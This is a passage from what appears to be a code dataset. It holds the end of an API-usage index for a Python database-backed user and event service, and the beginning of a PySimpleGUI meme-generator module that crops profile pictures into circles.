"usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 120, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 120, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "utils.KEY", 
"line_number": 125, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 128, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 128, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 128, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 132, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 132, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 132, "usage_type": "attribute"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 135, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 135, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 138, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 138, "usage_type": "name"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 138, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 138, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 138, "usage_type": "attribute"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 143, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 143, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 146, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 146, "usage_type": "name"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 146, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 146, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 146, "usage_type": "attribute"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 161, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 161, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 165, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 165, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 165, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 165, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 182, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 182, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 182, "usage_type": "attribute"}, {"api_name": "utils.KEY.SALT", "line_number": 182, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 188, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 188, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 188, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 188, "usage_type": "name"}, {"api_name": "utils.KEY.SALT", "line_number": 188, "usage_type": "attribute"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 195, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 195, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 197, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 197, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 211, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 211, 
"usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 211, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 215, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 215, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 215, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 215, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 215, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 231, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 231, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 235, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 235, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 235, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 235, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 240, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 240, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 241, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 241, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 242, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 242, "usage_type": "name"}, {"api_name": "utils.KEY.GENDER", "line_number": 243, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 243, "usage_type": "name"}, {"api_name": "utils.KEY.AGE", "line_number": 244, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 244, "usage_type": "name"}, {"api_name": "utils.KEY.PHONE", "line_number": 245, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 245, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 246, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 246, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 247, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 247, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 248, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 248, "usage_type": "name"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 249, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 249, "usage_type": "name"}, {"api_name": "utils.KEY.REPUTATION", "line_number": 250, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 250, "usage_type": "name"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 251, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 251, "usage_type": "name"}, {"api_name": "utils.KEY.IS_VERIFY", "line_number": 252, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 252, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 270, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 270, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 270, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 275, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 275, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 275, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 275, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 275, "usage_type": "attribute"}, {"api_name": 
"utils.KEY.EVENT_ID", "line_number": 277, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 277, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 294, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 294, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 295, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 295, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 295, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 298, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 298, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 298, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 298, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 298, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 303, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 306, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 306, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 306, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY.STATE", "line_number": 311, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 311, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 312, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 312, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 313, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 313, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 316, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 316, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 316, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 332, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 332, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 332, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 336, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 336, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 336, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 336, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 336, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 350, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 350, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 355, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 355, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 355, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 355, 
"usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 358, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 358, "usage_type": "name"}, {"api_name": "utils.KEY.LAUNCHER_ID", "line_number": 359, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 359, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 360, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 360, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 361, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 361, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 362, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 362, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 363, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 363, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 364, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 364, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 365, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 365, "usage_type": "name"}, {"api_name": "utils.KEY.FOLLOW_NUMBER", "line_number": 366, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 366, "usage_type": "name"}, {"api_name": "utils.KEY.SUPPORT_NUMBER", "line_number": 367, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 367, "usage_type": "name"}, {"api_name": "utils.KEY.GROUP_PTS", "line_number": 368, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 368, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 370, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 370, "usage_type": "name"}, {"api_name": "utils.KEY.LAUNCHER_ID", "line_number": 370, "usage_type": "attribute"}, {"api_name": "utils.KEY.LAUNCHER", "line_number": 373, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 373, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 373, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 391, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 391, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 407, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 407, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 409, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 409, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 410, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 410, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 411, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 411, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 412, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 412, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 413, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 413, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 414, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 414, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 415, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", 
"line_number": 417, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 417, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 433, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 433, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 435, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 435, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 436, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 436, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 437, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 437, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 438, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 438, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 440, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 440, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 454, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 454, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 454, "usage_type": "attribute"}, {"api_name": "utils.KEY.OPERATION", "line_number": 456, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 456, "usage_type": "name"}, {"api_name": "utils.KEY.OPERATION", "line_number": 458, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 458, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 463, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 463, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 463, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 463, "usage_type": "name"}, {"api_name": "utils.KEY.OPERATION", "line_number": 470, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 470, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 471, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 473, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 473, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 473, "usage_type": "attribute"}, {"api_name": "utils.KEY.OPERATION", "line_number": 473, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 475, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 475, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 494, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 494, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 494, "usage_type": "attribute"}, {"api_name": "utils.KEY.CONTENT", "line_number": 496, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 496, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 500, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 500, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 500, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY.CONTENT", 
"line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 515, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 519, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 519, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 519, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 531, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 531, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 537, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 537, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 537, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 537, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 540, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 540, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 561, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 561, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 566, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 566, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 566, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 566, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 569, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 569, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 570, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 570, "usage_type": "name"}, {"api_name": "utils.KEY.AUTHOR_ID", "line_number": 571, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 571, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 572, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 572, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 573, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 573, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 575, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 575, "usage_type": "name"}, {"api_name": "utils.KEY.AUTHOR_ID", "line_number": 575, "usage_type": "attribute"}, {"api_name": "utils.KEY.AUTHOR", "line_number": 578, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 578, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 578, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 596, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 596, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 596, "usage_type": "attribute"}, {"api_name": "utils.KEY.TYPE", "line_number": 596, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 600, "usage_type": 
"call"}, {"api_name": "dbhelper.dbhelper", "line_number": 600, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 600, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY.TYPE", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 616, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 616, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 616, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 620, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 620, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 620, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 620, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 620, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 639, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 641, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 641, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 644, "usage_type": "call"}, {"api_name": "utils.KEY.VALUE", "line_number": 644, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 644, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 655, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 655, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 655, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY.USER_ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 671, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 671, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 671, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 671, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 676, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 676, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 676, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 676, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 676, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 676, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 693, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 693, "usage_type": "name"}, {"api_name": "utils.KEY.HEALTH_ID", "line_number": 696, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 696, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 697, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 697, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 698, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 698, "usage_type": 
"name"}, {"api_name": "utils.KEY.VALUE", "line_number": 699, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 699, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 700, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 700, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 714, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 714, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 719, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 719, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 719, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 719, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 741, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 741, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 741, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 746, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 746, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 746, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 746, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 746, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 763, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 763, "usage_type": "name"}, {"api_name": "utils.KEY.ILLNESS_ID", "line_number": 766, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 766, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 767, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 767, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 768, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 768, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 769, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 769, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 783, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 783, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 789, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 789, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 789, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 789, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 809, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 809, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 813, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 813, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 813, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 813, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 826, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 826, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 832, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 832, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 832, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 832, "usage_type": "name"}, {"api_name": 
"dbhelper.dbhelper.execute_fetchone", "line_number": 851, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 851, "usage_type": "name"}]}
+{"seq_id": "5330771592", "text": "import PySimpleGUI as sg\nimport ventanas.configuracion as confg\nimport os\nimport ventanas.GeneradorImagen as img\nimport ventanas.interfaz_meme as meme\nimport ventanas.ActualizarPerfil as act\nfrom PIL import Image, ImageDraw, ImageOps\nimport io\nimport os\nimport json\nimport ventanas.Ayuda as ayuda\nimport ventanas.EtiquetarImagenes as etiquetar\n\ndef MostrarImagen(ruta_imagen):\n imagen=Image.open(ruta_imagen)\n \n #Recorto la imagen de forma circular y la adapto a las medidas que yo busco \n \n ancho=50\n alto=50\n imagen = imagen.resize((ancho, alto))\n mascara = Image.new('L', (ancho, alto), 0)\n dibujo = ImageDraw.Draw(mascara)\n dibujo.ellipse((0, 0, ancho, alto), fill=350)\n imagen = ImageOps.fit(imagen, mascara.size, centering=(0.5, 0.5))\n imagen.putalpha(mascara)\n imagen = imagen.convert('RGBA')\n # Convertir la imagen en un búfer de bytes\n with io.BytesIO() as output:\n imagen.save(output, format='PNG')\n data = output.getvalue()\n return data\n\ndef crearVentana(datos,nickname):\n print(datos)\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_imagenes=os.path.abspath(os.path.join(directorio,\"..\",\"imagenes\"))\n directorio_perfil=os.path.abspath(os.path.join(directorio_imagenes,nickname[0]+\".png\"))\n #sg.set_options(font=(\"Cooper Black\",16))\n data=MostrarImagen(directorio_perfil)\n\n menu =[ [sg.Image(background_color=\"tan\",size=(5,5))],\n 